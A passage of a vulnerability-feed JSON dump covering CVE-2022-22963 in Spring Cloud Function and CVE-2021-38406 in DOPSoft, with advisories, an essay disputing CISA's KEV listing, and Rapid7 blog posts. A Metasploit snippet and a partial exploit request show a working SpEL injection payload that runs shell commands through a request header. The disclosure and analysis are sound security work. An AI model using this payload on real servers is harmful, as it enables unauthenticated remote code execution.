>> /tmp/msf-success'})\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 0\n \n\nOn successful exploitation, the server responds with a 500 error and a JSON response.\n \n \n HTTP/1.1 500 Internal Server Error\n Content-Type: application/json\n Content-Length: 153\n \n {\"timestamp\":\"2022-03-30T20:41:28.551+00:00\",\"path\":\"/functionRouter\",\"status\":500,\"error\":\"Internal Server Error\",\"message\":\"\",\"requestId\":\"8fed4100-1\"}\n \n\nThe response from a server that was patched for the vulnerability (versions 3.1.7 and 3.2.3) is identical.\n\nThe vulnerability was patched on March, 29th, 2022 in commit [bcb2a25a](<https://github.com/spring-cloud/spring-cloud-function/commit/bcb2a25a28f3d026b35a795abe18d14f9cdb3022>). The patch adds a [second evaluation context](<https://github.com/spring-cloud/spring-cloud-function/blob/bcb2a25a28f3d026b35a795abe18d14f9cdb3022/spring-cloud-function-context/src/main/java/org/springframework/cloud/function/context/config/RoutingFunction.java#L64>) and uses it when the SpEL query [originates](<https://github.com/spring-cloud/spring-cloud-function/blob/bcb2a25a28f3d026b35a795abe18d14f9cdb3022/spring-cloud-function-context/src/main/java/org/springframework/cloud/function/context/config/RoutingFunction.java#L202>) from the HTTP request header. The [SimpleEvaluationContext](<https://docs.spring.io/spring-framework/docs/5.0.6.RELEASE/javadoc-api/org/springframework/expression/spel/support/SimpleEvaluationContext.html>) is used when the query originates from a header.\n\n> SimpleEvaluationContext is tailored to support only a subset of the SpEL language syntax, e.g. excluding references to Java types, constructors, and bean references.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "attackerkb", "title": "CVE-2022-22963", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-01T00:00:00", "id": "AKB:5BDFACBD-4722-492A-AAA8-EBCC3C6403C4", "href": "https://attackerkb.com/topics/1RIGeNMYFk/cve-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T20:21:01", "description": "Delta Electronic DOPSoft 2 (Version 2.00.07 and prior) lacks proper validation of user-supplied data when parsing specific project files. This could result in multiple out-of-bounds write instances. An attacker could leverage this vulnerability to execute code in the context of the current process.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at September 02, 2022 10:47am UTC reported:\n\nEdit: At 4:43pm EST on September 2, 2022, Director of CISA Jen Easterly responded to this entry via [tweet](<https://twitter.com/CISAJen/status/1565802511440777218?s=20&t=jGGMFllNltUdukyQ5ph7EA>). We appreciate the update and look forward to more improvements in the future.\n\n# CVE-2021-38406 Shouldn\u2019t Be on the CISA KEV List\n\nOn August 25, 2022, CISA added [CVE-2021-38406](<https://nvd.nist.gov/vuln/detail/CVE-2021-38406>) to their Known Exploited Vulnerabilities (KEV) Catalog. This was a significant addition to KEV because CVE-2021-38406 affects [Delta Industrial Automation\u2019s](<https://www.deltaww.com/en-us/products/Industrial-Automation/ALL/>) [DOPSoft](<https://filecenter.deltaww.com/Products/download/06/060302/Manual/DELTA_IA-HMI_DOPSoft_UM_EN_20211230.pdf>) software. This addition to the KEV catalog is almost certainly a mistake, which we\u2019ll discuss below in great detail. Technically, they might have included this CVE on purpose, but that would mean that CISA just low-key dropped some huge news about the next Stuxnet, which is unlikely to the point of unbelievability. But, you decide!\n\n\n\n## What\u2019s DOPSoft and CVE-2021-38406?\n\nDOPSoft is [HMI](<https://en.wikipedia.org/wiki/User_interface>) programming software. An attacker that exploits DOPSoft can potentially find themselves on an [engineering workstation](<https://collaborate.mitre.org/attackics/index.php/Engineering_Workstation>) within the ICS network _and_ with specialized programming access to local HMI. That\u2019s a very critical and dangerous place for any attacker to be.\n\nCVE-2021-38406 reportedly affects DOPSoft\u2019s parsing of project files. That\u2019s notable because, despite vulnerabilities affecting all sorts of ICS project files, there have been very few publicly disclosed examples of [project file infections](<https://attack.mitre.org/techniques/T0873/>) used in the wild. The only examples we\u2019re aware of are [Stuxnet](<https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf>) (Step7 project files) and [AutoCAD/AutoLISP project file](<https://ics-cert.kaspersky.com/media/Kaspersky-ICS-engineering-and-integration-sector-2020-En.pdf>) malware. With this KEV entry, CISA has disclosed a unique and ICS-specific attack being exploited in the wild.\n\nOf course, that\u2019s if you only look at the surface level information that CISA provides. The reality is that this CVE doesn\u2019t affect DOPSoft project files, and there is evidence that suggests the CVE was added to the catalog in error. Let\u2019s dive deeper.\n\n## The CVE Description is Bad\n\nCISA includes the CVE\u2019s description in their KEV entry. The description for CVE-2021-38406 follows:\n\n> Delta Electronic DOPSoft 2 (Version 2.00.07 and prior) lacks proper validation of user-supplied data when parsing specific project files. This could result in multiple out-of-bounds write instances. An attacker could leverage this vulnerability to execute code in the context of the current process.\n\nICS-CERT is the credited CNA and therefore the likely culprit for this misleading description. The vulnerability was actually discovered by the prolific vulnerability researcher, kimiya, and disclosed through the [Zero Day Initiative](<https://www.zerodayinitiative.com/>) (ZDI). The vulnerability description provided by ZDI for [CVE-2021-38406](<https://www.zerodayinitiative.com/advisories/ZDI-21-952/>) is much more specific.\n\n> This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Industrial Automation DOPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n> \n> The specific flaw exists within the parsing of XLS files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.\n\nHere we can see that ZDI says the vulnerability affects `xls` files. Notably, `xls` files _are not_ DOPSoft project files. `xls` is a Microsoft Excel format. Use of the [Microsoft XLS file format](<https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/cd03cb5f-ca02-4934-a391-bb674cb8aa06>) is only associated with one feature of DOPSoft, and that\u2019s multi-language support. The software can support multiple language texts on any given widget. For example, this DOPSoft screenshot shows a text block that can present as \u201chello world!\u201d in English, Spanish, or German.\n\n\n\nDOPSoft allows the programmer to export the multi-language data as an `xls` file, presumably, so language specialists can review/edit the content, and then the programmer can import updated versions of the text. This is all done through the `Edit` drop-down menu when a project is already loaded.\n\n\n\nWhen the data is exported, it looks exactly how you\u2019d expect:\n\n\n\nAccording to ZDI, the vulnerability is exploitable when a new multi-language `xls` is imported. Which means, getting back to the topic at hand, DOPSoft project files are not affected as ICS-CERT indicated. The `xls` file is **not** a project file (e.g. it doesn\u2019t control logic on an HMI, nor can it be used to launch DOPSoft). DOPSoft project files use the `dps`, `dpb`, or `dop` extension.\n\nThe only way the `xls` could be considered a project file is if the `Import Multi-Language Text` functionality embedded the `xls` in a DOPSoft project file. That would be a little strange, but not inconceivable (it\u2019s ICS software after all). So we decided to pull apart the DOPSoft project file format in order to find an embedded `xls`.\n\n## File Format Exploration\n\nIt\u2019s important to know if the `xls` is contained within DOPSoft project files, not just to nit-pick ICS-CERT, but to determine how many clicks are required to exploit a victim. The affected software is end-of-life and hasn\u2019t been patched for CVE-2021-38406, so understanding the full attack is important when discussing remediation guidance. If the `xls` file is contained within a project file then double clicking on the project will trigger the `xls` parsing and exploit the victim. If the `xls` is only parsed during `Import Multi-Language Text` then an attacker has to get a victim to launch DOPSoft, load a project, and then import the malicious `xls`. Both scenarios are obviously doable, but the second is more involved (and therefore less likely).\n\nThe DOPSoft `dps` project file is split into two parts. By default, the first part is essentially empty (a bitmap filled with `0xfc`). The second part contains gzip compressed data.\n\n\n\nThe compressed data explodes into a large binary blob of unknown format with a short ASCII preamble (\u201cDelta-HMI Screen Editor DOP V1010\u201d).\n\n\n\nWe spent some time in `windbg` figuring out what this unknown format is. Turns out, the file is xor encoded after the first 42 bytes. So we trim the project file:\n \n \n tail -c +42 B8B6 > B8B6.xor\n \n\nAnd run the following Python script to deobfuscate it:\n \n \n f = open('B8B6.xor', \"rb\")\n g = open('B8B6.deobfs', \"w\")\n \n try:\n while True:\n byte = f.read(1)\n if byte == '' or len(byte) == 0:\n break\n xbyte = chr(ord(byte) ^ 0x64)\n g.write(xbyte)\n finally:\n f.close()\n \n g.close()\n \n\nAnd the result is a very large `ini` file.\n \n \n [Application]\n Version=4.00.07.04\n DefaultScreen=1\n DefaultMemFmt=2\n PanelSeries=DOP-B series\n PanelName=DOP-B10E615 65536 Colors\n PanelRotate=0\n ModelName=-1106222768\n WarpText=1\n ShowAfterReadDataFlag=0\n StopUpload=0\n SpeedupPageChange=0\n StartupDelayTime=0\n Name=HMI\n OptimizeType=2\n CommInt=0\n IntRetry=3\n ControllerSection0=Delta\n ControllerName0=Delta DVP PLC\n HMIStationNr0=0\n DefPLCStationNr0=1\n CommName0=Link2\n PortNr0=2\n Interface0=0\n databits0=7\n stopbits0=1\n baud0=9600\n \u2026 truncated \u2026\n \n\nMost importantly, we find that the ini file contains **no** `xls` data. Instead, the multi-language data is represented as normal ini entries. Below you can see our three `hello worlds!`:\n \n \n [State]\n Value=0\n FgColor=16579836\n BgColor=11842740\n FontColor=0\n FontSize0=12\n FontRatio0=100\n FontName0=Arial\n wTextLen0=26\n h\\00e\\00l\\00l\\00o\\00 \\00w\\00o\\00r\\00l\\00d\\00!\\00\\00\\00\n FontSize1=12\n FontRatio1=100\n FontName1=Arial Greek\n wTextLen1=24\n h\\00o\\00l\\00a\\00 \\00m\\00u\\00\\00\\00\\00\\00o\\00!\\00\\00\\00\n FontSize2=12\n FontRatio2=100\n FontName2=Calibri\n wTextLen2=24\n h\\00a\\00l\\00l\\00o\\00 \\00w\\00e\\00l\\00t\\00!\\00\\00\\00\n FontAlign=33\n FontBold=0\n FontItalic=0\n \n\nWhich means, we don\u2019t think ICS-CERT\u2019s description is correct. The project file does not contain an `xls` file, so it will never trigger CVE-2021-38406. An attacker is required to trick the victim into loading the malicious `xls` via the `Import Multi-Language Text` feature. Users should be able to continue safely using DOPSoft affected by CVE-2021-38406, as long as they avoid using the multi-language import feature.\n\n## Ok. Fine. But Was It Exploited in the Wild?!\n\nExploitation might be complicated in a real world scenario. But it\u2019s still doable. The conditions are actually ideal.\n\n\n\nThe question, \u201cDoes CVE-2021-38406 belong in the KEV catalog?\u201d remains relevant even if the CVE description is bad.\n\nCISA calls the KEV catalog _the authoritative source of vulnerabilities that have been exploited in the wild_. However, CISA never provides any justification for the items they add, or don\u2019t add, to the catalog. Entries are simply added and that\u2019s that. But anyone that has been involved with the entry adding process knows that CISA largely relies on open source reporting from the security industry in order to populate the catalog. They\u2019ve chosen to never credit or even cite their sources, opting instead to represent the work as their own, for reasons we won\u2019t speculate on here.\n\nRegardless, the lack of citation/proof makes challenging any entry on the list almost impossible. Each KEV entry requires action by federal civilian executive branch agencies due to the [Binding Operation Directive 22-01](<https://www.cisa.gov/binding-operational-directive-22-01>). Each erroneous entry wastes time, resources, and taxpayer money, not just in the federal space but the myriad security companies that have been, more or less, forced to support the KEV catalog in their products. Not to mention the potential reputational harm an incorrect entry might cause. The fact that CISA provides no evidence and provides no obvious avenues for dissent is problematic.\n\nWhich brings us back to the subject at hand. CVE-2021-38406 was added to the KEV catalog along with 9 other vulnerabilities on August 25, 2022. Three of the newly added vulnerabilities, CVE-2022-22963 (Spring Cloud), CVE-2022-24112 (Apache APISIX), and CVE-2021-39226 (Grafana), were included in an August 19, 2022 article by Unit 42 called, _[Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More](<https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/>)_. The article details exploits seen in the wild. Additionally, Unit 42 **accidentally** tagged the article with the DOPSoft CVE, CVE-2021-38406.\n\n\n\nWe know this inclusion was accidental because Unit 42 does not discuss the vulnerability, even in passing, at any point in the article. Also, their data collection method, pictured below, would not be able to detect exploitation of CVE-2021-38406 because it\u2019s a local exploit requiring (fairly significant) user interaction.\n\n\n\nThe IPS _might_ see a malformed `xls` file over network traffic, but that isn\u2019t quite the same as seeing an actual exploitation attempt.\n\nAnd, finally, we know CVE-2021-38406 was accidentally tagged in that article because we were told so:\n\n\n\n## Conclusion\n\nThere is no other open source information indicating that CVE-2021-38406 has been exploited in the wild. Could it be that CISA knows this vulnerability, which requires significant user interaction to exploit niche ICS software, was exploited in the wild? Or is it more likely that CISA was lifting CVEs from Unit 42\u2019s blog and erroneously included CVE-2021-38406 because it was mistakenly included in the article?\n\nFinally, this research demonstrates that we clearly need _some_ kind of mechanism to challenge weird-looking updates to the KEV list to avoid burning a lot of time, effort, money, and heartache on chasing vulnerabilities that many, many people _must_ chase because they\u2019re subject to [BOD-22-1](<https://www.cisa.gov/binding-operational-directive-22-01>).\n\n_edit: Title changed as per request at 4:22pm EST on Sept. 2, 2022_\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 1\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-38406", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38406", "CVE-2021-39226", "CVE-2022-22963", "CVE-2022-24112"], "modified": "2021-10-05T00:00:00", "id": "AKB:2B7B662B-EDD1-4BFA-978A-6AE63790F8A5", "href": "https://attackerkb.com/topics/RHuGSieFJe/cve-2021-38406", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2022-04-01T15:27:32", "description": "Although Spring Cloud Functions are not as widespread as the Log4j library, and should provide a good separation from the hosting server, some draw the line between the two, due to the ease of exploitation over HTTP/s. This new vulnerability will definitely result in many threat actors launching campaigns for crypto-mining, ddos, ransomware, and as a golden ticket to break into organizations for the next years to come.", "cvss3": {}, "published": "2022-03-31T19:30:00", "type": "akamaiblog", "title": "Spring Cloud Function SpEL Injection (CVE-2022-22963) Exploited in the Wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T19:30:00", "id": "AKAMAIBLOG:8B6AA3E3035869AEAE3021AB3F1EFE32", "href": "https://www.akamai.com/blog/security/spring-cloud-function", "cvss": {"score": 0.0, "vector": "NONE"}}], "veracode": [{"lastseen": "2023-04-18T05:56:21", "description": "spring-cloud-function-context is vulnerable to remote code execution. The routing functionality allows a user to provide a malicious SpEL as a routing-expression which would allow arbitrary OS commands to be executed remotely.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T01:51:42", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-07-25T21:02:40", "id": "VERACODE:34884", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34884/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-04-07T13:29:14", "description": "\n\nWe have completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. We continue to monitor for new vulnerability instances and to remediate vulnerabilities on internally accessible services. We also continue to monitor our environment for anomalous activity, having found none so far. No action is required by our customers at this time.\n\n## Further reading and recommendations\n\nOur Emergent Threat Response team has put together a [detailed blog post](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) with general guidance about how to mitigate and remediate Spring4Shell. We will continue updating that post as we learn more about Spring4Shell and new remediation and mitigation approaches.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T14:42:42", "type": "rapid7blog", "title": "Update on Spring4Shell\u2019s Impact on Rapid7 Solutions and Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T14:42:42", "id": "RAPID7BLOG:46F0D57262DABE81708D657F2733AA5D", "href": "https://blog.rapid7.com/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T16:15:25", "description": "## CVE-2022-22963 - Spring Cloud Function SpEL RCE\n\n\n\nA new `exploit/multi/http/spring_cloud_function_spel_injection` module has been developed by our very own [Spencer McIntyre](<https://github.com/smcintyre-r7>) which targets Spring Cloud Function versions Prior to 3.1.7 and 3.2.3. This module is unrelated to [Spring4Shell CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), which is a separate vulnerability in the WebDataBinder component of Spring Framework.\n\nThis exploit works by crafting an unauthenticated HTTP request to the target application. When the `spring.cloud.function.routing-expression` HTTP header is received by the server it will evaluate the user provided SpEL (Spring Expression Language) query, leading to remote code execution. This can be seen within the [CVE-2022-22963 Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16395/files#diff-85438aef360f2d47359f2cb9d7f9f52465f8bc23f2d9b6fa04fc4fef6eef69dbR109-R111>):\n \n \n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n \n\nBoth patched and unpatched servers will respond with a 500 server error and a JSON encoded message\n\n## New module content (1)\n\n * [Spring Cloud Function SpEL Injection](<https://github.com/rapid7/metasploit-framework/pull/16395>) by Spencer McIntyre, hktalent, and m09u3r, which exploits [CVE-2022-22963](<https://attackerkb.com/topics/1RIGeNMYFk/cve-2022-22963?referrer=blog>) \\- This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to `3.1.7` and `3.2.3`.\n\n## Bugs fixed (2)\n\n * [#16364](<https://github.com/rapid7/metasploit-framework/pull/16364>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a fix for a crash in `auxiliary/spoof/dns/native_spoofer` and adds documentation for the module.\n * [#16386](<https://github.com/rapid7/metasploit-framework/pull/16386>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a crash when running the `exploit/multi/misc/java_rmi_server` module against at target server, such as Metasploitable2\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-03-24T13%3A07%3A34-04%3A00..2022-03-31T11%3A00%3A06-05%3A00%22>)\n * [Full diff 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/compare/6.1.35...6.1.36>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T18:34:29", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T18:34:29", "id": "RAPID7BLOG:F708A09CA1EFFC0565CA94D5DBC414D5", "href": "https://blog.rapid7.com/2022/04/01/metasploit-weekly-wrap-up-155/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-02T17:56:13", "description": "\n\nThe Vulnerability Management team kicked off Q2 by [remediating](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) the instances of [Spring4Shell](<https://docs.rapid7.com/insightvm/spring4shell/>) (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that impacted cybersecurity teams worldwide. We also made several investments to both [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) throughout the second quarter that will help improve and better automate vulnerability management for your organization. Let\u2019s dive in!\n\n## [InsightVM] New dashboard cards based on CVSS v3 Severity \n\nCVSS (Common Vulnerability Scoring System) is an open standard for scoring the severity of vulnerabilities; it\u2019s a key metric that organizations use to prioritize risk in their environments. To empower organizations with tools to do this more effectively, we recently duplicated seven CVSS dashboard cards in InsightVM to include a version that sorts the vulnerabilities based on CVSS v3 scores.The v3 CVSS system made some changes to both quantitative and qualitative scores. For example, [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) had a score of 9.3 (high) in v2 and a 10 (critical) in v3. \n\n**Having both V2 and V3 version dashboards available allows you to prioritize and sort vulnerabilities according to your chosen methodology.** Security is not one-size-fits all, and the CVSS v2 scoring might provide more accurate vulnerability prioritization for some customers. InsightVM allows customers to choose whether v2 or v3 scoring is a better option for their organizations\u2019 unique needs. \n\nThe seven cards now available for CVSS v3 are:\n\n * Exploitable Vulnerabilities by CVSS Score\n * Exploitable Vulnerability Discovery Date by CVSS Score\n * Exploitable Vulnerability Publish Age by CVSS Score\n * Vulnerability Count By CVSS Score Over Time\n * Vulnerabilities by CVSS Score\n * Vulnerability Discovery Date by CVSS Score\n * Vulnerability Publish Age by CVSS Score\n\n\n## [InsightVM] Asset correlation for Citrix VDI instances\n\nYou asked, and we listened. By popular demand, InsightVM can now identify agent-based assets that are Citrix VDI instances and correlate them to the user, enabling more accurate asset/instance tagging.\n\nPreviously, when a user started a non-persistent VDI, it created a new AgentID, which then created a new asset in the console and consumed a user license. The InsightVM team is excited to bring this solution to our customers for this widely persistent problem. \n\nThrough the Improved Agent experience for Citrix VDI instances, when User X logs into their daily virtual desktop, it will automatically correlate to User\u2019s experience, maintain the asset history, and consume only one license. **The result is a smoother, more streamlined experience for organizations that deploy and scan Citrix VDI.**\n\n## [Nexpose and InsightVM] Scan Assistant made even easier to manage\n\nIn December 2021, we launched Scan Assistant, a lightweight service deployed on an asset that uses digital certificates for handshake instead of account-based credentials; This alleviates the credential management headaches VM teams often encounter. The Scan Assistant is also designed to drive improved vulnerability scanning performance in both InsightVM and Nexpose, with faster completion times for both vulnerability and policy scans. \n\nWe recently released Scan Assistant 1.1.0, which automates Scan Assistant software updates and digital certificate rotation for customers seeking to deploy and maintain a fleet of Scan Assistants. This new automation improves security \u2013 digital certificates are more difficult to compromise than credentials \u2013 and simplifies administration for organizations by enabling them to centrally manage features from the Security Console.\n\nCurrently, these enhancements are only available on Windows OS. To opt into automated Scan Assistant software updates and/or digital certificate rotation, please visit the Scan Assistant tab in the Scan Template.\n\n\n\n\n\n## [[Nexpose](<https://docs.rapid7.com/nexpose/recurring-vulnerability-coverage/>) and [InsightVM](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>)] Recurring coverage \n\nRapid7 is committed to providing ongoing monitoring and coverage for a number of software products and services. The Vulnerability Management team continuously evaluates items to add to our recurring coverage list, basing selections on threat and security advisories, overall industry adoption, and customer requests. \n\nWe recently added several notable software products/services to our list of recurring coverage, including:\n\n * **AlmaLinux and Rocky Linux.** These free Linux operating systems have grown in popularity among Rapid7 Vulnerability Management customers seeking a replacement for CentOS. Adding recurring coverage for both AlmaLinux and Rocky Linux enables customers to more safely make the switch and maintain visibility into their vulnerability risk profile.\n * **Oracle E-Business Suite.** ERP systems contain organizations\u2019 \u201ccrown jewels\u201d \u2013 like customer data, financial information, strategic plans, and other proprietary data \u2013 so it\u2019s no surprise that attacks on these systems have [increased ](<https://www.mckinsey.com/business-functions/mckinsey-digital/our-insights/seven-steps-to-help-protect-your-erp-system-against-cyberattacks>)in recent years. Our new recurring coverage for the Oracle E-Business Suite is one of the most complex pieces of recurring coverage added to our list, providing coverage for several different components to ensure ongoing protection for Oracle E-Business Suite customers\u2019 most valuable information.\n * **VMware Horizon. **The VMware Horizon platform enables the delivery of virtual desktops and applications across a number of operating systems. VDI is a prime target for bad actors trying to access customer environments, due in part to its multiple entry points; once a hacker gains entry, it\u2019s fairly easy for them to jump into a company\u2019s servers and critical files. By providing recurring coverage for both the VMware server and client, Rapid7 gives customers broad coverage of this particular risk profile. \n\n## [InsightVM]\u200b\u200b Remediation Projects\n\nRemediation Projects help security teams collaborate and track progress of remediation work (often assigned to their IT ops counterparts). We\u2019re excited to announce a few updates to this feature:\n\n### Better way to track progress for projects\n\nThe InsightVM team has updated the metric that calculates progress for Remediation Projects. The new metric will advance for each individual asset remediated within a \u201csolution\u201d group. Yes, this means customers no longer have to wait for all the affected assets to be remediated to see progress. Security teams can thus have meaningful discussions about progress with assigned remediators or upper management. [Learn more](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>).\n\n### Remediator Export\n\nWe added a new and much requested solution-based CSV export option to Remediation Projects. Remediator Export contains detailed information about the assets, vulnerabilities, proof data, and more for a given solution. This update makes it easy 